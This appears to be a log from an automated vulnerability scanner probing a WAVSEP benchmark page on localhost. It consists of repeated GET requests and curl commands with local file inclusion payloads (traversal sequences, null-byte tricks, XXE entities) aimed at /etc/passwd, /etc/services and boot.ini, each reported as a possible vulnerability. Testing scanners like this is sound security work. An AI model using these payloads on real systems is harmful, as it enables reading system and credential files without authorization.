GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
